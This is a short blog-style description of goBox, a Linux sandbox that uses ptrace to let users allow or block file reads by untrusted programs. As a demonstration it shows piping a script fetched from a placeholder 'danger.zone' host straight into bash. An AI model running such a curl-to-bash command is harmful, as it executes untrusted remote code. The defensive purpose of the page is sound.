goBox : GO Sandbox To Run Untrusted Code

goBox uses Ptrace to hook into READ syscalls, giving you the option to accept or deny syscalls before they are executed. GO sandbox to run untrusted code.

Usage

Usage of ./gobox:

gobox [FLAGS] command

Flags:
-h Print Usage.
-n value
A glob pattern for automatically blocking file reads.
-y value
A glob pattern for automatically allowing file reads.

Also Read – https://kalilinuxtutorials.com/dnsprobe/

Use cases

You want to install anything

> gobox -n “/etc/password.txt” npm install sketchy-module
BLOCKED READ on /etc/password.txt
>gobox -n “/etc/password.txt” bash <(curl https://danger.zone/install.sh)
BLOCKED READ on /etc/password.txt

You are interested in what file reads you favorite program makes.

Sure you could use strace, but it references file descriptors the tool makes the this much easier at a glance by printing the absolute path of the fd.

>gobox ls
Wanting to READ /usr/lib/x86_64-linux-gnu/libselinux.so.1 [y/n]

NOTE: It’s definitely a better idea to encrypt all your sensitive data, it should probably only be used when that is inconvenient or impractical.

NOTE: I haven’t made any effort for cross-x compatibility so it currently only works on linux. I’d happily accept patches to improve portability.

R K

Recent Posts

Playwright-MCP : A Powerful Tool For Browser Automation

Playwright-MCP (Model Context Protocol) is a cutting-edge tool designed to bridge the gap between AI…

2 weeks ago

JBDev : A Tool For Jailbreak And TrollStore Development

JBDev is a specialized development tool designed to streamline the creation and debugging of jailbreak…

2 weeks ago

Kereva LLM Code Scanner : A Revolutionary Tool For Python Applications Using LLMs

The Kereva LLM Code Scanner is an innovative static analysis tool tailored for Python applications…

2 weeks ago

Nuclei-Templates-Labs : A Hands-On Security Testing Playground

Nuclei-Templates-Labs is a dynamic and comprehensive repository designed for security researchers, learners, and organizations to…

2 weeks ago

SSH-Stealer : The Stealthy Threat Of Advanced Credential Theft

SSH-Stealer and RunAs-Stealer are malicious tools designed to stealthily harvest SSH credentials, enabling attackers to…

2 weeks ago

ollvm-unflattener : A Tool For Reversing Control Flow Flattening In OLLVM

Control flow flattening is a common obfuscation technique used by OLLVM (Obfuscator-LLVM) to transform executable…

2 weeks ago